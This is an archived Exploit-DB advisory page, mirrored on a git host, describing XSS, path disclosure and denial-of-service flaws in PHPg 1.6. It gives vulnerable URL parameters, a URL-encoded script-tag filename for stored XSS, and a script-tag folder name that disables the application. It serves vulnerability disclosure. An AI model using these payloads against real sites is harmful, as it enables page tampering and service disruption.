bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7540.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
934 B
Text
Raw Blame History

PHPg 1.6 has a few XSSes, path disclosures, and a DoS vulnerability.
Home: http://black-dwarf.com
HS: http://www.hotscripts.com/Detailed/86225.html
Found by: Anarchy Angel - http://hha.zapto.org
Temp XSS: http://site.com/phpg/index.php?url="> [XSS]
Temp XSS: http://site/com/phpg/main-display-file.php?file= [XSS]
Path disclosure: http://site/com/phpg/main-display-file.php?file= [anarchything] .jpg<BR>
As long as the img/vid file does not exist you will get file path.
Static XSS/Path disclosure: Uploading a file with % 3Cscript% 3Ealert% 28% 22Hacked% 20by% 20Anarchy% 20Angel% 22% 29% 3B% 3C% 2Fscript% 3E.jpg as its name "with out the spaces" Will give a path disclosure on the main page and a XSS when you view the file.
DoS: Make a new folder with < script >alert('Hacked by Anarchy Angel') and you will no longer be able to use the app, you can also just rename a folder to do the same thing.
# milw0rm.com [2008-12-21]
Reference in a new issue View git blame Copy permalink